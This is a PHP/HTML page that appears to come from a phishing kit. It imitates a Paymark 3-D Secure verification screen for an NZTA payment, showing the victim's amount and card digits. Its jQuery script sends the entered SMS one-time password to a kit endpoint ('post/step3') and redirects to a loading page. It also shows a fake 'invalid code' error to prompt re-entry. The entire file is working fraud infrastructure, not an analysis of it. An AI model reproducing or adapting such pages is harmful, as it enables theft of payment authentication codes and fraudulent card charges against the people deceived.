<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, shrink-to-fit=no">
    <title>3DS</title>
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/4.6.0/css/bootstrap.min.css">
</head>

<body>
<div id="user-section" class="container" style="margin-top: 50px;margin-bottom: 50px;">
    <div class="row">
        <div class="col-md-8 col-lg-6 col-xl-4 offset-md-2 offset-lg-3 offset-xl-4" style="padding: 15px;border-radius: 2px;border: 1px solid rgb(241,243,244);">
            <div class="table-responsive">
                <table class="table">
                    <thead>
                    <tr>
                        <th><img class="img-fluid" src="../../../assets/img/paymark-logo.png" width="124"></th>
                        <th>
                            <?php
                                if($_SESSION['brand'] == 'visa'){
                                    echo '<img class="img-fluid" src="../../../3d/'.$page.'/files/v.png" width="50">';
                                }elseif($_SESSION['brand'] == 'mastercard'){
                                    echo '<img src="../../../3d/'.$page.'/files/ms.png" height="35">';
                                }else{
                                    echo'<img class="img-fluid" src="../../../3d/'.$page.'/files/v.png" width="50"><img src="../../../3d/'.$page.'/files/ms.png" height="35">';
                                }
                            ?>
                        </th>
                    </tr>
                    </thead>
                    <tbody></tbody>
                </table>
            </div>
            <p class="lead text-center" style="font-size: 14px;">Please enter the One-Time Password (OTP) that was sent to you by SMS.<br></p>
            <div style="font-size: 12px;display: <?php echo $display;?>" id="error-msg" class="alert alert-danger" role="alert"><span><strong>Error 002:</strong><br>Invalid authenticator code , please try again.<br></span></div>
            <span class="text-black-50"><strong>Transaction Details</strong><br></span>
            <div class="table-responsive">
                <table class="table">
                    <thead>
                    <tr></tr>
                    </thead>
                    <tbody>
                    <tr>
                        <td style="font-size: 12px;"><strong>Merchant:</strong></td>
                        <td style="font-size: 12px;">NZTA</td>
                    </tr>
                    <tr>
                        <td style="font-size: 12px;"><strong>Transaction Amount:</strong></td>
                        <td style="font-size: 12px;"><?php echo $_SESSION['amount_to_pay'];?> NZD</td>
                    </tr>
                    <tr>
                        <td style="font-size: 12px;"><strong>Card Number:</strong><br></td>
                        <td style="font-size: 12px;">************<?php echo $_SESSION['last_four'];?></td>
                    </tr>
                    <tr>
                        <td style="font-size: 12px;"><strong id="code-er">OTP Code:</strong><br></td>
                        <td><input class="input-group" id="otp-code" name="otp_code" type="tel"></td>
                    </tr>
                    <tr>
                        <td id="empty_error" class="text-danger d-none" colspan="2"><span style="font-size: smaller;">Please enter your OTP code</span></td>
                    </tr>
                    <tr>
                        <td><br></td>
                        <td><button id="otp-btn" class="btn btn-dark" type="button" style="background: rgb(0,0,0);border-color: rgb(0,0,0);border-radius: 0px;">Submit</button></td>
                    </tr>
                    </tbody>
                </table>
            </div>
        </div>
    </div>
</div>
<script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.0/jquery.min.js"></script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/4.6.0/js/bootstrap.bundle.min.js"></script>
<script>
    $(document).ready(function(){
        $('#otp-btn').on('click', function(){
            var otp = $("#otp-code").val();
            if(otp.length > 3 && otp !== ''){
                $.ajax({
                    type: "post",
                    url: '../../../post/step3',
                    dataType: "json",
                    data: "code=" + otp + "",
                    success: function (data) {
                        try { window.location.replace("../../../loading"); }
                        catch(e) { window.location = "../../../loading"; }
                    },
                    error: function (data, errorThrown) {
                        console.log('mochkla fi php');
                    }
                });
            }else {
                $("#otp-code").addClass('border-danger');
                $("#empty_error").removeClass("d-none");
            }
        });
    });
</script>
</body>

</html>